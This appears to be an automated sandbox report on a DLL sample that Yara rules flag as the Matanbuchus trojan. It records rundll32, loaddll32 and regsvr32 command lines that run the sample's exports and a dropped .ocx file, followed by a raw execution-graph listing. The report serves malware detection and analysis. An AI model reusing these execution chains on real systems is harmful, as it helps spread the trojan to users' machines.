                    Data Ascii: 8wZKwKhWYyMzaxaYwPqWtPQWe4dvKzRUpKbYJrQGcys0upaD4L7Ra9RhIJuHtS5QpC5jpDyq/aSVpSbsAHYQ1AbyY6rMCeKjFDqi6PQGcyM91dqQ6KbWtPQe1389++bktKhLZPQWeyTsVdGwjKEJlJNFq5ZjrRJEPBP2endAs6M70fZrlFfSNHJ2gc+6msqg8wZKwK/WYyMzaxaYwP0WtPQWe4doqz9UtKbYLbQWcys0upaD4P7Ra9R


                    Statistics

                    CPU Usage

                    Click to jump to process

                    Memory Usage

                    Click to jump to process

                    High Level Behavior Distribution

                    Click to dive into process behavior distribution

                    Behavior

                    Click to jump to process

                    System Behavior

                    General

                    Target ID:0
                    Start time:07:25:02
                    Start date:06/10/2024
                    Path:C:\Windows\System32\loaddll32.exe
                    Wow64 process (32bit):true
                    Commandline:loaddll32.exe "C:\Users\user\Desktop\file.dll"
                    Imagebase:0xce0000
                    File size:126'464 bytes
                    MD5 hash:51E6071F9CBA48E79F10C84515AAE618
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    General

                    Target ID:1
                    Start time:07:25:03
                    Start date:06/10/2024
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff75da10000
                    File size:862'208 bytes
                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    General

                    Target ID:2
                    Start time:07:25:03
                    Start date:06/10/2024
                    Path:C:\Windows\SysWOW64\cmd.exe
                    Wow64 process (32bit):true
                    Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\file.dll",#1
                    Imagebase:0x410000
                    File size:236'544 bytes
                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    General

                    Target ID:3
                    Start time:07:25:03
                    Start date:06/10/2024
                    Path:C:\Windows\SysWOW64\rundll32.exe
                    Wow64 process (32bit):true
                    Commandline:rundll32.exe C:\Users\user\Desktop\file.dll,CheckLicense
                    Imagebase:0x550000
                    File size:61'440 bytes
                    MD5 hash:889B99C52A60DD49227C5E485A016679
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    General

                    Target ID:4
                    Start time:07:25:03
                    Start date:06/10/2024
                    Path:C:\Windows\SysWOW64\rundll32.exe
                    Wow64 process (32bit):true
                    Commandline:rundll32.exe "C:\Users\user\Desktop\file.dll",#1
                    Imagebase:0x550000
                    File size:61'440 bytes
                    MD5 hash:889B99C52A60DD49227C5E485A016679
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    General

                    Target ID:12
                    Start time:07:25:06
                    Start date:06/10/2024
                    Path:C:\Windows\SysWOW64\rundll32.exe
                    Wow64 process (32bit):true
                    Commandline:rundll32.exe C:\Users\user\Desktop\file.dll,DllInit
                    Imagebase:0x550000
                    File size:61'440 bytes
                    MD5 hash:889B99C52A60DD49227C5E485A016679
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    General

                    Target ID:14
                    Start time:07:25:09
                    Start date:06/10/2024
                    Path:C:\Windows\SysWOW64\rundll32.exe
                    Wow64 process (32bit):true
                    Commandline:rundll32.exe C:\Users\user\Desktop\file.dll,DllInstall
                    Imagebase:0x550000
                    File size:61'440 bytes
                    MD5 hash:889B99C52A60DD49227C5E485A016679
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_Matanbuchus, Description: Yara detected Matanbuchus, Source: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Matanbuchus_4ce9affb, Description: unknown, Source: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                    • Rule: Windows_Trojan_Matanbuchus_58a61aaa, Description: unknown, Source: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                    • Rule: JoeSecurity_Matanbuchus, Description: Yara detected Matanbuchus, Source: 0000000E.00000002.3111806010.0000000004910000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Matanbuchus_58a61aaa, Description: unknown, Source: 0000000E.00000002.3111806010.0000000004910000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                    • Rule: Windows_Trojan_Matanbuchus_4ce9affb, Description: unknown, Source: 0000000E.00000002.3112462220.0000000004BA6000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                    • Rule: Windows_Trojan_Matanbuchus_58a61aaa, Description: unknown, Source: 0000000E.00000002.3112462220.0000000004BA6000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                    • Rule: Windows_Trojan_Matanbuchus_58a61aaa, Description: unknown, Source: 0000000E.00000002.3113053269.000000006D051000.00000020.00000001.01000000.00000003.sdmp, Author: unknown
                    Reputation:high
                    Has exited:false

                    General

                    Target ID:16
                    Start time:07:25:12
                    Start date:06/10/2024
                    Path:C:\Windows\SysWOW64\rundll32.exe
                    Wow64 process (32bit):true
                    Commandline:rundll32.exe "C:\Users\user\Desktop\file.dll",CheckLicense
                    Imagebase:0x550000
                    File size:61'440 bytes
                    MD5 hash:889B99C52A60DD49227C5E485A016679
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    General

                    Target ID:17
                    Start time:07:25:12
                    Start date:06/10/2024
                    Path:C:\Windows\SysWOW64\rundll32.exe
                    Wow64 process (32bit):true
                    Commandline:rundll32.exe "C:\Users\user\Desktop\file.dll",DllInit
                    Imagebase:0x550000
                    File size:61'440 bytes
                    MD5 hash:889B99C52A60DD49227C5E485A016679
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    General

                    Target ID:18
                    Start time:07:25:12
                    Start date:06/10/2024
                    Path:C:\Windows\SysWOW64\rundll32.exe
                    Wow64 process (32bit):true
                    Commandline:rundll32.exe "C:\Users\user\Desktop\file.dll",DllInstall
                    Imagebase:0x550000
                    File size:61'440 bytes
                    MD5 hash:889B99C52A60DD49227C5E485A016679
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: Windows_Trojan_Matanbuchus_4ce9affb, Description: unknown, Source: 00000012.00000002.3112574505.0000000005081000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                    • Rule: Windows_Trojan_Matanbuchus_58a61aaa, Description: unknown, Source: 00000012.00000002.3112574505.0000000005081000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                    • Rule: Windows_Trojan_Matanbuchus_58a61aaa, Description: unknown, Source: 00000012.00000002.3113049716.000000006D051000.00000020.00000001.01000000.00000003.sdmp, Author: unknown
                    • Rule: JoeSecurity_Matanbuchus, Description: Yara detected Matanbuchus, Source: 00000012.00000002.3114291162.000000007ED40000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Matanbuchus_4ce9affb, Description: unknown, Source: 00000012.00000002.3114291162.000000007ED40000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                    • Rule: Windows_Trojan_Matanbuchus_58a61aaa, Description: unknown, Source: 00000012.00000002.3114291162.000000007ED40000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                    Reputation:high
                    Has exited:false

                    General

                    Target ID:19
                    Start time:07:25:12
                    Start date:06/10/2024
                    Path:C:\Windows\SysWOW64\rundll32.exe
                    Wow64 process (32bit):true
                    Commandline:rundll32.exe "C:\Users\user\Desktop\file.dll",curl_easy_setopt
                    Imagebase:0x550000
                    File size:61'440 bytes
                    MD5 hash:889B99C52A60DD49227C5E485A016679
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    General

                    Target ID:20
                    Start time:07:25:12
                    Start date:06/10/2024
                    Path:C:\Windows\SysWOW64\rundll32.exe
                    Wow64 process (32bit):true
                    Commandline:rundll32.exe "C:\Users\user\Desktop\file.dll",curl_easy_perform
                    Imagebase:0x550000
                    File size:61'440 bytes
                    MD5 hash:889B99C52A60DD49227C5E485A016679
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Has exited:true

                    General

                    Target ID:21
                    Start time:07:25:12
                    Start date:06/10/2024
                    Path:C:\Windows\SysWOW64\rundll32.exe
                    Wow64 process (32bit):true
                    Commandline:rundll32.exe "C:\Users\user\Desktop\file.dll",curl_easy_init
                    Imagebase:0x550000
                    File size:61'440 bytes
                    MD5 hash:889B99C52A60DD49227C5E485A016679
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Has exited:true

                    General

                    Target ID:22
                    Start time:07:25:12
                    Start date:06/10/2024
                    Path:C:\Windows\SysWOW64\rundll32.exe
                    Wow64 process (32bit):true
                    Commandline:rundll32.exe "C:\Users\user\Desktop\file.dll",curl_easy_cleanup
                    Imagebase:0x550000
                    File size:61'440 bytes
                    MD5 hash:889B99C52A60DD49227C5E485A016679
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: Windows_Trojan_Matanbuchus_58a61aaa, Description: unknown, Source: 00000016.00000002.1885875877.000000006D051000.00000020.00000001.01000000.00000003.sdmp, Author: unknown
                    Has exited:true

                    General

                    Target ID:23
                    Start time:07:25:12
                    Start date:06/10/2024
                    Path:C:\Windows\SysWOW64\rundll32.exe
                    Wow64 process (32bit):true
                    Commandline:rundll32.exe "C:\Users\user\Desktop\file.dll",Uninitialize
                    Imagebase:0x550000
                    File size:61'440 bytes
                    MD5 hash:889B99C52A60DD49227C5E485A016679
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Has exited:true

                    General

                    Target ID:24
                    Start time:07:25:12
                    Start date:06/10/2024
                    Path:C:\Windows\SysWOW64\rundll32.exe
                    Wow64 process (32bit):true
                    Commandline:rundll32.exe "C:\Users\user\Desktop\file.dll",ThreadFunction
                    Imagebase:0x550000
                    File size:61'440 bytes
                    MD5 hash:889B99C52A60DD49227C5E485A016679
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Has exited:true

                    General

                    Target ID:25
                    Start time:07:25:12
                    Start date:06/10/2024
                    Path:C:\Windows\SysWOW64\rundll32.exe
                    Wow64 process (32bit):true
                    Commandline:rundll32.exe "C:\Users\user\Desktop\file.dll",Main
                    Imagebase:0x550000
                    File size:61'440 bytes
                    MD5 hash:889B99C52A60DD49227C5E485A016679
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Has exited:true

                    General

                    Target ID:27
                    Start time:07:25:12
                    Start date:06/10/2024
                    Path:C:\Windows\SysWOW64\rundll32.exe
                    Wow64 process (32bit):true
                    Commandline:rundll32.exe "C:\Users\user\Desktop\file.dll",InitDll
                    Imagebase:0x550000
                    File size:61'440 bytes
                    MD5 hash:889B99C52A60DD49227C5E485A016679
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Has exited:true

                    General

                    Target ID:28
                    Start time:07:25:12
                    Start date:06/10/2024
                    Path:C:\Windows\SysWOW64\rundll32.exe
                    Wow64 process (32bit):true
                    Commandline:rundll32.exe "C:\Users\user\Desktop\file.dll",Init
                    Imagebase:0x550000
                    File size:61'440 bytes
                    MD5 hash:889B99C52A60DD49227C5E485A016679
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Has exited:true

                    General

                    Target ID:29
                    Start time:07:25:12
                    Start date:06/10/2024
                    Path:C:\Windows\SysWOW64\rundll32.exe
                    Wow64 process (32bit):true
                    Commandline:rundll32.exe "C:\Users\user\Desktop\file.dll",DllUninitialize
                    Imagebase:0x550000
                    File size:61'440 bytes
                    MD5 hash:889B99C52A60DD49227C5E485A016679
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Has exited:true

                    General

                    Target ID:31
                    Start time:07:25:13
                    Start date:06/10/2024
                    Path:C:\Windows\SysWOW64\WerFault.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7588 -s 608
                    Imagebase:0xc10000
                    File size:483'680 bytes
                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Has exited:true

                    General

                    Target ID:33
                    Start time:07:25:15
                    Start date:06/10/2024
                    Path:C:\Windows\System32\regsvr32.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\System32\regsvr32.exe -e -n -i:"C:\Users\user\8f08\user-PC\user-PC.ocx" "C:\Users\user\8f08\user-PC\user-PC.ocx"
                    Imagebase:0x7ff66b4e0000
                    File size:25'088 bytes
                    MD5 hash:B0C2FA35D14A9FAD919E99D9D75E1B9E
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Has exited:false

                    General

                    Target ID:34
                    Start time:07:25:15
                    Start date:06/10/2024
                    Path:C:\Windows\SysWOW64\regsvr32.exe
                    Wow64 process (32bit):true
                    Commandline: -e -n -i:"C:\Users\user\8f08\user-PC\user-PC.ocx" "C:\Users\user\8f08\user-PC\user-PC.ocx"
                    Imagebase:0xe60000
                    File size:20'992 bytes
                    MD5 hash:878E47C8656E53AE8A8A21E927C6F7E0
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_Matanbuchus, Description: Yara detected Matanbuchus, Source: 00000022.00000002.3113971469.000000007EE40000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Matanbuchus_4ce9affb, Description: unknown, Source: 00000022.00000002.3113971469.000000007EE40000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                    • Rule: Windows_Trojan_Matanbuchus_58a61aaa, Description: unknown, Source: 00000022.00000002.3113971469.000000007EE40000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                    • Rule: Windows_Trojan_Matanbuchus_58a61aaa, Description: unknown, Source: 00000022.00000002.3112823931.000000006B811000.00000020.00000001.01000000.00000008.sdmp, Author: unknown
                    • Rule: Windows_Trojan_Matanbuchus_4ce9affb, Description: unknown, Source: 00000022.00000002.3112253212.00000000056DD000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                    • Rule: Windows_Trojan_Matanbuchus_58a61aaa, Description: unknown, Source: 00000022.00000002.3112253212.00000000056DD000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                    Has exited:false

                    General

                    Target ID:36
                    Start time:09:14:27
                    Start date:06/10/2024
                    Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                    Imagebase:0x7ff6b56d0000
                    File size:468'120 bytes
                    MD5 hash:B3676839B2EE96983F9ED735CD044159
                    Has elevated privileges:true
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Has exited:true

                    General

                    Target ID:37
                    Start time:09:14:27
                    Start date:06/10/2024
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff75da10000
                    File size:862'208 bytes
                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                    Has elevated privileges:true
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Has exited:true

                    Disassembly

                    Reset < >

                      Execution Graph

                      Execution Coverage:3.9%
                      Dynamic/Decrypted Code Coverage:100%
                      Signature Coverage:50.8%
                      Total number of Nodes:2000
                      Total number of Limit Nodes:57
                      execution_graph 63284 7f36c571 6 API calls swprintf 63283 7f36c571 7 API calls swprintf 61316 7f373992 61317 7f3739ba 61316->61317 61812 7f3345e0 61317->61812 61322 7f373caf 61324 7f3345e0 53 API calls 61322->61324 61323 7f3345e0 53 API calls 61325 7f373af5 61323->61325 61326 7f373e25 61324->61326 62306 7f33d200 61325->62306 61328 7f3342d0 53 API calls 61326->61328 61329 7f373e2b 61328->61329 61330 7f373fbe 61329->61330 61332 7f3345e0 53 API calls 61329->61332 61331 7f3345e0 53 API calls 61330->61331 61333 7f374112 61331->61333 61335 7f373e56 61332->61335 61336 7f3342d0 53 API calls 61333->61336 61334 7f373b0d 61337 7f3345e0 53 API calls 61334->61337 62356 7f334770 32 API calls 61335->62356 61339 7f374118 61336->61339 61340 7f373b6a 61337->61340 61341 7f3742ab 61339->61341 61344 7f3345e0 53 API calls 61339->61344 61342 7f33d200 32 API calls 61340->61342 61343 7f3345e0 53 API calls 61341->61343 61345 7f373b82 61342->61345 61346 7f3743ff 61343->61346 61347 7f374143 61344->61347 61348 7f3463a0 std::ios_base::clear 32 API calls 61345->61348 61350 7f3342d0 53 API calls 61346->61350 62359 7f334770 32 API calls 61347->62359 61352 7f373bac 61348->61352 61349 7f373e5d 61353 7f3345e0 53 API calls 61349->61353 61354 7f374405 61350->61354 61355 7f3463a0 std::ios_base::clear 32 API calls 61352->61355 61356 7f373ea6 61353->61356 61359 7f374598 61354->61359 61363 7f3345e0 53 API calls 61354->61363 61357 7f373bde 61355->61357 62357 7f334770 32 API calls 61356->62357 61360 7f3463a0 std::ios_base::clear 32 API calls 61357->61360 61362 7f3345e0 53 API calls 61359->61362 61365 7f373bff 61360->61365 61361 7f373ead 61366 7f3463a0 std::ios_base::clear 32 API calls 61361->61366 61367 7f3746ec 61362->61367 61368 7f374430 61363->61368 61364 7f37414a 61369 7f3345e0 53 API calls 61364->61369 61370 7f3463a0 std::ios_base::clear 32 API calls 61365->61370 61371 7f373ece 61366->61371 61372 7f3342d0 53 API calls 61367->61372 62362 7f334770 32 API calls 61368->62362 61374 7f374193 61369->61374 61375 7f373c20 61370->61375 61376 7f3463a0 std::ios_base::clear 32 API calls 61371->61376 61377 7f3746f2 61372->61377 62360 7f334770 32 API calls 61374->62360 61379 7f3ac670 53 API calls 61375->61379 61380 7f373f00 61376->61380 61381 7f374885 61377->61381 61382 7f3345e0 53 API calls 61377->61382 61384 7f373c36 61379->61384 61385 7f3463a0 std::ios_base::clear 32 API calls 61380->61385 61386 7f3345e0 53 API calls 61381->61386 61387 7f37471d 61382->61387 61383 7f37419a 61389 7f3463a0 std::ios_base::clear 32 API calls 61383->61389 61390 7f3463a0 std::ios_base::clear 32 API calls 61384->61390 61391 7f373f21 61385->61391 61392 7f3749d9 61386->61392 62365 7f334770 32 API calls 61387->62365 61388 7f374437 61395 7f3345e0 53 API calls 61388->61395 61396 7f3741bb 61389->61396 61397 7f373c57 61390->61397 61398 7f3463a0 std::ios_base::clear 32 API calls 61391->61398 61393 7f3342d0 53 API calls 61392->61393 61399 7f3749df 61393->61399 61400 7f374480 61395->61400 61401 7f3463a0 std::ios_base::clear 32 API calls 61396->61401 61402 7f3463a0 std::ios_base::clear 32 API calls 61397->61402 61403 7f373f42 61398->61403 61404 7f374b72 61399->61404 61410 7f3345e0 53 API calls 61399->61410 62363 7f334770 32 API calls 61400->62363 61406 7f3741ed 61401->61406 61407 7f373c78 61402->61407 61408 7f3ac670 53 API calls 61403->61408 61409 7f3345e0 53 API calls 61404->61409 61412 7f3463a0 std::ios_base::clear 32 API calls 61406->61412 61413 7f3b0dd0 111 API calls 61407->61413 61414 7f373f58 61408->61414 61415 7f374cc6 61409->61415 61416 7f374a0a 61410->61416 61411 7f374487 61418 7f3463a0 std::ios_base::clear 32 API calls 61411->61418 61419 7f37420e 61412->61419 61420 7f373c88 61413->61420 61421 7f3463a0 std::ios_base::clear 32 API calls 61414->61421 61422 7f3342d0 53 API calls 61415->61422 62368 7f334770 32 API calls 61416->62368 61417 7f374724 61424 7f3345e0 53 API calls 61417->61424 61425 7f3744a8 61418->61425 61426 7f3463a0 std::ios_base::clear 32 API calls 61419->61426 62312 7f37ca10 61420->62312 61428 7f373f79 61421->61428 61429 7f374ccc 61422->61429 61430 7f37476d 61424->61430 61431 7f3463a0 std::ios_base::clear 32 API calls 61425->61431 61432 7f37422f 61426->61432 61434 7f3463a0 std::ios_base::clear 32 API calls 61428->61434 61435 7f374e5f 61429->61435 61443 7f3345e0 53 API calls 61429->61443 62366 7f334770 32 API calls 61430->62366 61437 7f3744da 61431->61437 61438 7f3ac670 53 API calls 61432->61438 61440 7f373f9a 61434->61440 61442 7f3345e0 53 API calls 61435->61442 61445 7f3463a0 std::ios_base::clear 32 API calls 61437->61445 61446 7f374245 61438->61446 61441 7f3b0dd0 111 API calls 61440->61441 61447 7f373faa 61441->61447 61448 7f374fb3 61442->61448 61449 7f374cf7 61443->61449 61444 7f374774 61451 7f3463a0 std::ios_base::clear 32 API calls 61444->61451 61452 7f3744fb 61445->61452 61453 7f3463a0 std::ios_base::clear 32 API calls 61446->61453 62358 7f349250 53 API calls Concurrency::cancellation_token_source::~cancellation_token_source 61447->62358 61456 7f3342d0 53 API calls 61448->61456 62371 7f334770 32 API calls 61449->62371 61450 7f374a11 61458 7f3345e0 53 API calls 61450->61458 61459 7f374795 61451->61459 61460 7f3463a0 std::ios_base::clear 32 API calls 61452->61460 61454 7f374266 61453->61454 61461 7f3463a0 std::ios_base::clear 32 API calls 61454->61461 61462 7f374fb9 61456->61462 61463 7f374a5a 61458->61463 61464 7f3463a0 std::ios_base::clear 32 API calls 61459->61464 61465 7f37451c 61460->61465 61467 7f374287 61461->61467 61468 7f37514c 61462->61468 61474 7f3345e0 53 API calls 61462->61474 62369 7f334770 32 API calls 61463->62369 61470 7f3747c7 61464->61470 61466 7f3ac670 53 API calls 61465->61466 61471 7f374532 61466->61471 61472 7f3b0dd0 111 API calls 61467->61472 61473 7f3345e0 53 API calls 61468->61473 61476 7f3463a0 std::ios_base::clear 32 API calls 61470->61476 61478 7f3463a0 std::ios_base::clear 32 API calls 61471->61478 61479 7f374297 61472->61479 61480 7f3752a0 61473->61480 61481 7f374fe4 61474->61481 61475 7f374a61 61483 7f3463a0 std::ios_base::clear 32 API calls 61475->61483 61477 7f3747e8 61476->61477 61484 7f3463a0 std::ios_base::clear 32 API calls 61477->61484 61485 7f374553 61478->61485 62361 7f349250 53 API calls Concurrency::cancellation_token_source::~cancellation_token_source 61479->62361 61487 7f3342d0 53 API calls 61480->61487 62374 7f334770 32 API calls 61481->62374 61482 7f374cfe 61489 7f3345e0 53 API calls 61482->61489 61490 7f374a82 61483->61490 61492 7f374809 61484->61492 61493 7f3463a0 std::ios_base::clear 32 API calls 61485->61493 61494 7f3752a6 61487->61494 61495 7f374d47 61489->61495 61491 7f3463a0 std::ios_base::clear 32 API calls 61490->61491 61496 7f374ab4 61491->61496 61497 7f3ac670 53 API calls 61492->61497 61498 7f374574 61493->61498 61499 7f375439 61494->61499 61506 7f3345e0 53 API calls 61494->61506 62372 7f334770 32 API calls 61495->62372 61502 7f3463a0 std::ios_base::clear 32 API calls 61496->61502 61503 7f37481f 61497->61503 61504 7f3b0dd0 111 API calls 61498->61504 61505 7f3345e0 53 API calls 61499->61505 61501 7f374d4e 61507 7f3463a0 std::ios_base::clear 32 API calls 61501->61507 61508 7f374ad5 61502->61508 61509 7f3463a0 std::ios_base::clear 32 API calls 61503->61509 61510 7f374584 61504->61510 61511 7f37558d 61505->61511 61512 7f3752d1 61506->61512 61515 7f374d6f 61507->61515 61516 7f3463a0 std::ios_base::clear 32 API calls 61508->61516 61517 7f374840 61509->61517 62364 7f349250 53 API calls Concurrency::cancellation_token_source::~cancellation_token_source 61510->62364 61519 7f3342d0 53 API calls 61511->61519 62377 7f334770 32 API calls 61512->62377 61513 7f374feb 61514 7f3345e0 53 API calls 61513->61514 61521 7f375034 61514->61521 61522 7f3463a0 std::ios_base::clear 32 API calls 61515->61522 61523 7f374af6 61516->61523 61524 7f3463a0 std::ios_base::clear 32 API calls 61517->61524 61525 7f375593 61519->61525 62375 7f334770 32 API calls 61521->62375 61529 7f374da1 61522->61529 61530 7f3ac670 53 API calls 61523->61530 61531 7f374861 61524->61531 61532 7f375726 61525->61532 61539 7f3345e0 53 API calls 61525->61539 61526 7f3752d8 62378 7f376b80 33 API calls std::ios_base::clear 61526->62378 61535 7f3463a0 std::ios_base::clear 32 API calls 61529->61535 61536 7f374b0c 61530->61536 61537 7f3b0dd0 111 API calls 61531->61537 61538 7f3345e0 53 API calls 61532->61538 61533 7f3752dd 61547 7f3345e0 53 API calls 61533->61547 61534 7f37503b 61541 7f3463a0 std::ios_base::clear 32 API calls 61534->61541 61542 7f374dc2 61535->61542 61543 7f3463a0 std::ios_base::clear 32 API calls 61536->61543 61544 7f374871 61537->61544 61545 7f37587a 61538->61545 61540 7f3755be 61539->61540 62381 7f334770 32 API calls 61540->62381 61548 7f37505c 61541->61548 61549 7f3463a0 std::ios_base::clear 32 API calls 61542->61549 61550 7f374b2d 61543->61550 62367 7f349250 53 API calls Concurrency::cancellation_token_source::~cancellation_token_source 61544->62367 61552 7f3342d0 53 API calls 61545->61552 61555 7f375321 61547->61555 61556 7f3463a0 std::ios_base::clear 32 API calls 61548->61556 61557 7f374de3 61549->61557 61558 7f3463a0 std::ios_base::clear 32 API calls 61550->61558 61553 7f375880 61552->61553 61559 7f375a13 61553->61559 61566 7f3345e0 53 API calls 61553->61566 61554 7f3755c5 62382 7f377a60 33 API calls std::ios_base::clear 61554->62382 62379 7f334770 32 API calls 61555->62379 61562 7f37508e 61556->61562 61563 7f3ac670 53 API calls 61557->61563 61564 7f374b4e 61558->61564 61565 7f3345e0 53 API calls 61559->61565 61569 7f3463a0 std::ios_base::clear 32 API calls 61562->61569 61570 7f374df9 61563->61570 61571 7f3b0dd0 111 API calls 61564->61571 61572 7f375b67 61565->61572 61573 7f3758ab 61566->61573 61567 7f3755ca 61580 7f3345e0 53 API calls 61567->61580 61568 7f375328 61574 7f3463a0 std::ios_base::clear 32 API calls 61568->61574 61575 7f3750af 61569->61575 61576 7f3463a0 std::ios_base::clear 32 API calls 61570->61576 61577 7f374b5e 61571->61577 61578 7f3342d0 53 API calls 61572->61578 62385 7f334770 32 API calls 61573->62385 61581 7f375349 61574->61581 61582 7f3463a0 std::ios_base::clear 32 API calls 61575->61582 61583 7f374e1a 61576->61583 62370 7f349250 53 API calls Concurrency::cancellation_token_source::~cancellation_token_source 61577->62370 61585 7f375b6d 61578->61585 61587 7f37560e 61580->61587 61588 7f3463a0 std::ios_base::clear 32 API calls 61581->61588 61589 7f3750d0 61582->61589 61590 7f3463a0 std::ios_base::clear 32 API calls 61583->61590 61591 7f375d00 61585->61591 61598 7f3345e0 53 API calls 61585->61598 61586 7f3758b2 62386 7f3568e0 32 API calls std::ios_base::clear 61586->62386 62383 7f334770 32 API calls 61587->62383 61594 7f37537b 61588->61594 61595 7f3ac670 53 API calls 61589->61595 61596 7f374e3b 61590->61596 61597 7f3345e0 53 API calls 61591->61597 61601 7f3463a0 std::ios_base::clear 32 API calls 61594->61601 61602 7f3750e6 61595->61602 61603 7f3b0dd0 111 API calls 61596->61603 61605 7f375e54 61597->61605 61606 7f375b98 61598->61606 61599 7f3758b7 61613 7f3345e0 53 API calls 61599->61613 61600 7f375615 61607 7f3463a0 std::ios_base::clear 32 API calls 61600->61607 61608 7f37539c 61601->61608 61609 7f3463a0 std::ios_base::clear 32 API calls 61602->61609 61604 7f374e4b 61603->61604 62373 7f349250 53 API calls Concurrency::cancellation_token_source::~cancellation_token_source 61604->62373 61611 7f3342d0 53 API calls 61605->61611 62389 7f334770 32 API calls 61606->62389 61614 7f375636 61607->61614 61615 7f3463a0 std::ios_base::clear 32 API calls 61608->61615 61616 7f375107 61609->61616 61618 7f375e5a 61611->61618 61620 7f3758fb 61613->61620 61621 7f3463a0 std::ios_base::clear 32 API calls 61614->61621 61622 7f3753bd 61615->61622 61617 7f3463a0 std::ios_base::clear 32 API calls 61616->61617 61623 7f375128 61617->61623 61624 7f375fed 61618->61624 61632 7f3345e0 53 API calls 61618->61632 61619 7f375b9f 62390 7f356730 33 API calls std::ios_base::clear 61619->62390 62387 7f334770 32 API calls 61620->62387 61627 7f375668 61621->61627 61628 7f3ac670 53 API calls 61622->61628 61630 7f3b0dd0 111 API calls 61623->61630 61631 7f3345e0 53 API calls 61624->61631 61635 7f3463a0 std::ios_base::clear 32 API calls 61627->61635 61629 7f3753d3 61628->61629 61636 7f3463a0 std::ios_base::clear 32 API calls 61629->61636 61637 7f375138 61630->61637 61638 7f376141 61631->61638 61639 7f375e85 61632->61639 61633 7f375ba4 61647 7f3345e0 53 API calls 61633->61647 61634 7f375902 61640 7f3463a0 std::ios_base::clear 32 API calls 61634->61640 61641 7f375689 61635->61641 61643 7f3753f4 61636->61643 62376 7f349250 53 API calls Concurrency::cancellation_token_source::~cancellation_token_source 61637->62376 61645 7f3342d0 53 API calls 61638->61645 62393 7f334770 32 API calls 61639->62393 61648 7f375923 61640->61648 61642 7f3463a0 std::ios_base::clear 32 API calls 61641->61642 61649 7f3756aa 61642->61649 61650 7f3463a0 std::ios_base::clear 32 API calls 61643->61650 61651 7f376147 